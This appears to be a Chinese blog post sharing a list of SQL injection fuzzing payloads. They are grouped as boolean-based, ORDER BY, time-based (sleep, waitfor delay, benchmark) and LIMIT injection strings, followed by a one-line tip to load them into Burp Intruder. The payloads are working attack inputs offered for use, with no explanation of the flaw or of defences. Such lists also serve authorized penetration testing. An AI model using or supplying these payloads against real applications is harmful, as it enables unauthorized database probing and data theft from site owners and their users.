zoukankan      html  css  js  c++  java

  • 分享一些平时测试用的sql payloads

    1:BOOL SQLINJECTION


    '
    "
    %df'
    %df"
    and 1=1
    and 1=2
    ' and '1'='1
    ' and '1'='2
    " and "1"="1
    " and "1"="2
    ) and (1=1
    ) and (1=2
    ') and ('1'='1
    ') and ('1'='2
    %' and 1=1 and '%'='
    %' and 1=2 and '%'='x
    %') and 1=1 and ('%'='
    %') and 1=2 and ('%'='x
    OR 1=1
    OR 1=2
    ' OR 1=1-- -
    ' OR 1=2-- -
    ) OR 1=1-- -
    ) OR 1=2-- -
    ') OR 1=1-- -
    ') OR 1=2-- -
    " OR "1"="1
    " OR "1"="2
    ' OR '1'='1
    ' OR '1'='2
    ) OR (1=1
    ) OR (1=2
    ') OR ('1'='1
    ') OR ('1'='2

    2:ORDER BY SQLINJECTION fuzz payload

    (case when(1=1) then 1 else (select 1 union select 2) end)
    (case when(1=2) then 1 else (select 1 union select 2) end)
    ,(1-(case when(1=1) then 1 else (select 1 union select 2) end))
    ,(1-(case when(1=2) then 1 else (select 1 union select 2) end))
    ,1=if((1=1),1,(select 1 union select 2))
    ,1=if((1=2),1,(select 1 union select 2))
    ,If((1=1),1,(select 1 union select 2))-- -
    ,If((1=2),1,(select 1 union select 2))-- -
    ,If((1=1),sleep(4),(select 1 union select 2))-- -
    -IF((1=1),1,(SELECT 1 UNION SELECT 2))-- -
    -IF((1=2),1,(SELECT 1 UNION SELECT 2))-- -
    -(case when(1=1) then 1 else (select 1 union select 2) end)
    -(case when(1=2) then 1 else (select 1 union select 2) end)

    3:TIME-BASE SQLINJECTION

    '%2b(if((1=1 and sleep(4)),1,(select 1 union select 2)))%2b'a
    -IF((1=1),sleep(4),(SELECT 1 UNION SELECT 2))-- -
    ';(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ;SELECT sleep(4)
    );SELECT sleep(4)-- -
    ;SELECT sleep(4)-- -
    ;(SELECT 1 FROM(SELECT(sleep(4)))lWuP)-- -
    ' AND SLEEP(4)%23
    AND sleep(4)
    ' AND sleep(4) AND '1'='1
    ') AND sleep(4) AND ('1'='1
    ) AND sleep(4) AND (1=1
    " AND sleep(4) AND "1"="
    ') and (select(0)from(select(sleep(4)))x)-- -
    and (select(0)from(select(sleep(4)))x)
    and (select(0)from(select(sleep(4)))x) and 1=1
    ' and (select(0)from(select(sleep(4)))x) and '1'='1
    " and (select(0)from(select(sleep(4)))x) and "1"="1
    ) and (select(0)from(select(sleep(4)))x) and (1=1
    ') and (select(0)from(select(sleep(4)))x) and ('1'='1
    rlike (select(0)from(select(sleep(4)))x) and 1=1
    ' rlike (select(0)from(select(sleep(4)))x) and '1'='1
    ) rlike (select(0)from(select(sleep(4)))x) and (1=1
    ') rlike (select(0)from(select(sleep(4)))x) and ('1'='1
    ;waitfor delay '0:0:4' -- -
    ';waitfor delay '0:0:4' -- -
    );waitfor delay '0:0:4' -- -
    ');waitfor delay '0:0:4' -- -
    if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
    (SELECT * FROM(SELECT(sleep(4)))lWuP)

    4:LIMIT SQLINJECTION 

    procedure analyse(extractvalue(1,if(1=1,benchmark(5000000,md5(1)),2)),1)

    用法就不用多说,放burp instuder fuzz 就行了
  • 相关阅读:
    查看tomcat启动文件都干点啥---server对象
    Spring的AOP浅尝
    Spark1.3.0安装
    HMM的概率计算问题和预测问题的java实现
    C语言实现求字符串子集问题
    AdaBoost的java实现
    ID3决策树预测的java实现
    决策树ID3算法的java实现
    Naive Bayes在mapreduce上的实现
    Kmeans在MapReduce中的实现
  • 原文地址:https://www.cnblogs.com/depycode/p/5576204.html
Copyright © 2011-2022 走看看